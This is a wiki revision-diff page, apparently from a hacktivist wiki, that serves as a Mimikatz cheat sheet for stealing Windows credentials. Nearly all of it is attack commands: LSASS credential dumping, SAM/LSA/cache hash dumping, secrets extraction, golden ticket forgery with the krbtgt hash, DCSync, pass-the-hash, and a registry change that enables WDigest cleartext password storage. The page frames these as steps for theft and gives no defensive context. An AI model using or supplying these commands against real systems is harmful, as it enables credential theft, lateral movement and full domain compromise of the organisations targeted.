Mimikatz: Difference between revisions

From Enlace Hacktivista
Jump to navigation Jump to search
mNo edit summary
Line 1: Line 1:
=== Elevate privileges ===
* privilege::debug
* token::elevate
=== Stealing plain text credentials ===
=== Stealing plain text credentials ===
* privilege::debug
* sekurlsa::logonpasswords
* sekurlsa::logonpasswords


=== Dump lsass via task manager ===
=== Dump lsass via task manager ===
Task Manager > Details > lsass.exe > Right click > Create dump file > lsass.DMP
Task Manager > Details > lsass.exe > Right click > Create dump file > lsass.DMP
* privilege::debug
* sekurlsa::minidump lsass.DMP
* sekurlsa::minidump lsass.DMP
* sekurlsa::logonpasswords
* sekurlsa::logonpasswords


=== Dump hashes ===
=== Dump hashes ===
* token::elevate
* lsadump::sam
* lsadump::sam
* lsadump::lsa /patch
* lsadump::lsa /patch
Line 16: Line 17:
* lsadump::cache
* lsadump::cache
* sekurlsa::ekeys
* sekurlsa::ekeys
=== Secrets ===
* lsadump::secrets


=== Create a golden ticket on the domain controller ===
=== Create a golden ticket on the domain controller ===
* privilege::debug
* lsadump::lsa /inject /name:krbtgt
* lsadump::lsa /inject /name:krbtgt
* kerberos::golden /user:<USER> /domain:<DOMAIN.LOCAL> /sid:<SID> /krbtgt:<KRBTGT> /id:<ID>
* kerberos::golden /user:<USER> /domain:<DOMAIN.LOCAL> /sid:<SID> /krbtgt:<KRBTGT> /id:<ID>

Revision as of 06:11, 26 June 2023

Elevate privileges

  • privilege::debug
  • token::elevate

Stealing plain text credentials

  • sekurlsa::logonpasswords

Dump lsass via task manager

Task Manager > Details > lsass.exe > Right click > Create dump file > lsass.DMP

  • sekurlsa::minidump lsass.DMP
  • sekurlsa::logonpasswords

Dump hashes

  • lsadump::sam
  • lsadump::lsa /patch
  • lsadump::lsa /inject
  • lsadump::cache
  • sekurlsa::ekeys

Secrets

  • lsadump::secrets

Create a golden ticket on the domain controller

  • lsadump::lsa /inject /name:krbtgt
  • kerberos::golden /user:<USER> /domain:<DOMAIN.LOCAL> /sid:<SID> /krbtgt:<KRBTGT> /id:<ID>
  • misc::cmd

Retrieve the password hashes of user accounts from a domain controller

  • lsadump::dcsync /user:<USER> /domain:<DOMAIN.LOCAL>

Pass the hash

  • sekurlsa::pth /user:<USER> /domain:<DOMAIN.LOCAL> /ntlm:<HASH> /run:cmd

Wdigest - extracting passwords in cleartext

  • sekurlsa::wdigest
  • reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
Retrieved from "https://enlacehacktivista.org/index.php?title=Mimikatz&oldid=1075"